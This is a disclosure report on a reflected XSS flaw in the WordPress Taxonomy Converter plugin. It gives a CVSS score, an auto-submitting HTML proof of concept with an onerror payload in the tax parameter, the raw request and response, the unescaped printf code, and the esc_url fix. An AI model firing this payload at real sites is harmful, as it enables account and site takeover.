Reflected XSS: Taxonomy Converter via tax parameter
Discovered by foobar7 on Wordpress

This issue took 4 Days and 23 hours to triage and 157 Days and 20 hours to close the report once triaged.



CVSS

Medium 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Description

The Taxonomy Converter that is listed on the Official WordPress plugins page is vulnerable to reflected XSS as it echoes the tax parameter without encoding.

POC

<html>
  <body>
    <form action="http://192.168.0.104/wordpress5/wordpress/wp-admin/admin.php?import=wptaxconvert&tax=categoryx'"><img+src%3dx+onerror%3dalert(1)>&step=2" method="POST" enctype="text/plain">
      <input type="hidden" name="test" value="test
" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Request

POST /wordpress5/wordpress/wp-admin/admin.php?import=wptaxconvert&tax=categoryx'"><img+src%3dx+onerror%3dalert(1)>&step=2 HTTP/1.1
Host: 192.168.0.104
[...]

test=test

HTTP/1.1 200 OK
[...]

Uh, oh. Something didn’t work. Please <a href="admin.php?import=wptaxconvert&tax=categoryx\'\"><img src=x onerror=alert(1)>">try again</a>.

Code

/wp-content/plugins/taxonomy-converter/taxonomy-converter.php

function process($tax) {
    global $wpdb;

    if ( (!isset($_POST['terms_to_convert']) || !is_array($_POST['terms_to_convert'])) && empty($this->terms_to_convert) || (!isset($_POST['taxes'])) ) { ?>
        <div class="narrow">
        <?php printf(__('Uh, oh. Something didn’t work. Please <a href="%s">try again</a>.', 'wptaxconvert'), 'admin.php?import=wptaxconvert&tax='.$tax); ?>
        </div>
<?php        return;
    }

Solution

Apply esc_url or similar to $tax before passing it to printf.

Impact

With a successful attack, an attacker can access all data the attacked user has access to, as well as perform arbitrary requests in the name of the attacked user.

If the attacked user is an administrator, the attacker could for example create a new admin user and thus gain full control of the application (and depending on the settings, the server).